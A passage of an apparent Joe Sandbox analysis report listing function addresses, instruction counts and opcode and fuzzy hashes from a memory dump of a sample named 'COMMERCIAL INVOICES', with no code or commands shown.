                                                                                                                                                                                                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                                                      • Instruction ID: e69d359860a1cd2fa2553c153663154a363999193791460acecc5c5def738277
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29B19474A106069FDB24DF99C944EBBBBFAFF84704F10851EAB4297790EA74E905CB10
                                                                                                                                                                                                                                      Function 01250535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                                      • Instruction ID: bd8c0ecebbc27073ae8e2d03b8cf8b8f190a7b8d047c25509abde7988fd16b7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EB11831620646AFDB15DB68C890BBEBBF6BF48304F180569EB52D7281D770ED41CB94
                                                                                                                                                                                                                                      Function 012483C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7d9b4cae964ea12760caec6e66f98e73e0b88fd0999d7d852ce0e4922ae36453
                                                                                                                                                                                                                                      • Instruction ID: f54de30d1d80d4a93fbee22b374e9f6325d9e318211a3a3d24659b9a790f78c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d9b4cae964ea12760caec6e66f98e73e0b88fd0999d7d852ce0e4922ae36453
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAC159746283418FD764CF59C484BABB7E5FF88304F44496EEA8987291D774E908CF92
                                                                                                                                                                                                                                      Function 0123C427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7e05ff283e8d79d927d017c71e2159c3532fd390984e73ce4e6ebcd01134ddc1
                                                                                                                                                                                                                                      • Instruction ID: 776f0e71a8d76ae22e790309f268fe1e6575419d82a22211f48ac97b2a14ac8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e05ff283e8d79d927d017c71e2159c3532fd390984e73ce4e6ebcd01134ddc1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89B163B0A202668BDB65DF58D890BB9B3B5EF94700F0485EAD54AF7281DB70DD85CF20
                                                                                                                                                                                                                                      Function 0126E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3eca925c48de738218a211cbd22e6559cb7b31d041e726ca3bb64eea61fb11e8
                                                                                                                                                                                                                                      • Instruction ID: 7bb0a10c2113188c3bff18d8e2d84d46c9e2fa5a7e80b55fd851ace7c34eb3d8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3eca925c48de738218a211cbd22e6559cb7b31d041e726ca3bb64eea61fb11e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EA14835E20256DFEB22DB58C948BAEBBB9BF04754F060115EB01AB2D1D7789D80CBD1
                                                                                                                                                                                                                                      Function 01280185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ff5e7ad7dd6fe21b74f3dc81d27e810fff36db686ca12f0a2f2c6e9dbad0f2c6
                                                                                                                                                                                                                                      • Instruction ID: f230c04c3b06853f942fee0788d8bd6a5cf59c7bc65d7bf044a980237f1192ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff5e7ad7dd6fe21b74f3dc81d27e810fff36db686ca12f0a2f2c6e9dbad0f2c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DA103B0B226169FDB24EF69C891BBAB7B5FF54314F004029EB05A72C1EB74E845CB54
                                                                                                                                                                                                                                      Function 01314500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 742601fce911c47d8688087ca652c1aae7d730efb8a079446ef90a521e755bbd
                                                                                                                                                                                                                                      • Instruction ID: 3ec2370e297a9f31844e430f1c3577018212555be41dffe0c353865eeea21a78
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 742601fce911c47d8688087ca652c1aae7d730efb8a079446ef90a521e755bbd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EA1F0B2A10212EFC71ADF18C980B2ABBE9FF48758F040928F985DB655D335ED01CB91
                                                                                                                                                                                                                                      Function 01312B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                                                                                      • Instruction ID: ade595f0e03d49e4a82906d01b29025542fd749b68386fde8b99ccdc01776a3d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6B13C71E0061ADFDF19CFADC880AAEBBB5FF48314F248169E914A7358D730A941CB90
                                                                                                                                                                                                                                      Function 012C60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bff2bed6335dd315dc7ebe426c4fa12189cf5c3089b31009be608e6418f3d492
                                                                                                                                                                                                                                      • Instruction ID: bb2f9fc16871e89f9aff6026db1ac4698f257b8574d3fb78faaf5c3aeeb505a5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bff2bed6335dd315dc7ebe426c4fa12189cf5c3089b31009be608e6418f3d492
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0918371D10216AFDB15CFA8D894BBEBBB9AF48B10F15426DEB10AB341D774D900DBA0
                                                                                                                                                                                                                                      Function 0125E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6e36a5d6d6f29275636955a61a96229bc23bf10146e5db3df6c5e831c0511eb8
                                                                                                                                                                                                                                      • Instruction ID: 3ffc6e930019646af66f9e1ab0ef94144e54d44be7e557e7e6117aaa923940af
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e36a5d6d6f29275636955a61a96229bc23bf10146e5db3df6c5e831c0511eb8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1914771A20213DFEB64DB29D4C1B7EBBA2EF94718F064066EE059B380E634DE41C761
                                                                                                                                                                                                                                      Function 0130AB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                                                                      • Instruction ID: 723f48db2e35f9d2e5317b57da42af6f1731f318f7ec93c84d1393945e29c968
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11818F31A107099FDF1ACF9CD8A0AAEBBF6BF84314F198569D9169B384D734E901CB50
                                                                                                                                                                                                                                      Function 0127E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ca2e442e0697e4cb50e688d14b2c94b9e3243293d1b03791e846bd3bcf293300
                                                                                                                                                                                                                                      • Instruction ID: faf482d862e9d638bf8692ad8e0bad8d55779564b53eb391a9afa68f7423dd71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca2e442e0697e4cb50e688d14b2c94b9e3243293d1b03791e846bd3bcf293300
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A816C71A1060AAFDB25DFA9C880AEFBBFAFF48354F114429E655A7250D730AC45CB60
                                                                                                                                                                                                                                      Function 0125C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4fdc8cf21908bb814bd0eb08aff3157a7db65459138297fb59d942754c3682c2
                                                                                                                                                                                                                                      • Instruction ID: a5486907fb34e2a31c63ba9878e65270000332966c6c05ecdb739d0407cb2e7b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fdc8cf21908bb814bd0eb08aff3157a7db65459138297fb59d942754c3682c2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC71F275C2462ADFCB29CF68D4917BEBBB8FF58710F14411AEA41AB350E3749910CBA0
                                                                                                                                                                                                                                      Function 012F47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e13cace66fb49d3843b84e3ba14a33a371783a155119f30cd2f1df987a37dc00
                                                                                                                                                                                                                                      • Instruction ID: ad24d3136d8153a378941c48c401f4ea7a2f9b5089868200a11809744272efcb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e13cace66fb49d3843b84e3ba14a33a371783a155119f30cd2f1df987a37dc00
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 587192B1A20246EFDB20EF59D955AABFBF8FF90300F00416EE70497258C7B18A44CB58
                                                                                                                                                                                                                                      Function 0125260B Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9fd7685f81e0b69aae6adde92b38e98bb51b5e31a1c1b14124142c8151eeb3da
                                                                                                                                                                                                                                      • Instruction ID: c2281be0afcd239caf7de912867b2d7909a4f34b744532b207b5179710badd84
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fd7685f81e0b69aae6adde92b38e98bb51b5e31a1c1b14124142c8151eeb3da
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D271B072624242CFD355DF28C480B2AB7E5FF84710F0985AAED958B392DB74DC46CBA1
                                                                                                                                                                                                                                      Function 012C035C Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                                                                      • Instruction ID: 41bf747e8562cb4ca6dd62af269fa3387f7d5b38936172690a9454a3a84a4828
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB718275A1060AEFDB10DFA9C984EEEBBB8FF58740F104569EA05E7250DB34EA01CB54
                                                                                                                                                                                                                                      Function 012D62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: bae6764543303439461e485263f5471d84332390365012c39ccb76b10a36a14e
                                                                                                                                                                                                                                      • Instruction ID: d7de8246fb1d5b0be942cebfb340c3a0248241b28f27e7b5758077cddf9a1a2b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bae6764543303439461e485263f5471d84332390365012c39ccb76b10a36a14e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5971E032260702AFE732DF18C845F6ABBE6EF40760F154428E6568B2E1DB75E944CB50
                                                                                                                                                                                                                                      Function 01248AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a47b57a6abdc36c3b3d79cccf17b39901cc99d7cf17155900150f3abd42b4d24
                                                                                                                                                                                                                                      • Instruction ID: bb30d7e03b8c7248d39ce471493e0f3eb2f1f3f071aa8e25079b20a3733e8b2d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a47b57a6abdc36c3b3d79cccf17b39901cc99d7cf17155900150f3abd42b4d24
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA81BE72A34316CFDB28CF98D584BAEB7B5BF88314F594129DA00AB281E7749D40CB94
                                                                                                                                                                                                                                      Function 01318324 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6171724db3d0eda8725e2809788203a550ee798e258b75b2d38fbb64087b780c
                                                                                                                                                                                                                                      • Instruction ID: 67823eacee7047cdbaaffc78a647277f16300a26cf020b43caee613eacb528d7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6171724db3d0eda8725e2809788203a550ee798e258b75b2d38fbb64087b780c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22714971E11209EFDB16DF94C881FEEBBB8FF04354F104169EA20A6294E774AA01CB94
                                                                                                                                                                                                                                      Function 012FA250 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 330f45141a2068a05222bb968e8cc2a9e1c13c09d35feb42faf82dcb94b27b1e
                                                                                                                                                                                                                                      • Instruction ID: ea4650ba22225da8294a3060e6321ffe6e030a501dfc1ad26fa77cf33aa19d83
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 330f45141a2068a05222bb968e8cc2a9e1c13c09d35feb42faf82dcb94b27b1e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8751AE72524612AFD712DE68C884F6BFBE8EBC5750F01493DBB44DB150D670ED0587A2
                                                                                                                                                                                                                                      Function 012E8350 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 55fbcfcb230c0fb134bb629654f2db4b6f9caeb8d90f2a009f6053b2ad86d763
                                                                                                                                                                                                                                      • Instruction ID: f00c8dfd96374e76abeee0cd534f0eb04cebf9b05b2b2c411b112d5a6835bf9b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55fbcfcb230c0fb134bb629654f2db4b6f9caeb8d90f2a009f6053b2ad86d763
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6151CF70910706DFD721DF6AC888AABFBF8FF94710F50461EE292576A0D7B0A545CB90
                                                                                                                                                                                                                                      Function 0127E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: df34b71b4bcb6beee0607769434184431144aa912524b0646ef9b271c2ddf041
                                                                                                                                                                                                                                      • Instruction ID: dd90327f811303915669bbaa4342f1f394c4c2a5c3948957cc66a01c62a56819
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df34b71b4bcb6beee0607769434184431144aa912524b0646ef9b271c2ddf041
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C515B71620A06DFCB22EF69C9C0EAAB7FDFF14784F410469EA5197260E734E940CB60
                                                                                                                                                                                                                                      Function 012E4180 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2fe2fc031a2fdf1500d4b281efe1434ae7ba2140ae3a52421ddef04f2c9f55be
                                                                                                                                                                                                                                      • Instruction ID: 1e52ef59d20f15749d6c65e593051ed3278e0f46ccab2025efda3c0f3a531446
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fe2fc031a2fdf1500d4b281efe1434ae7ba2140ae3a52421ddef04f2c9f55be
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1518B716283828FD750EF29C885A6BB7E5BFC8208F94492DF699C7250EB30D905CB56
                                                                                                                                                                                                                                      Function 012645B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                                                                      • Instruction ID: 26a7819e365c3e00360ca7b3a483b1fb9e5067e9820f139f6f7734aeb72a40b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42516171E1025AAFDF1AEF94C440BFEBBB9AF45754F044069EA41AB280D774DD84CBA0
                                                                                                                                                                                                                                      Function 012CE9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
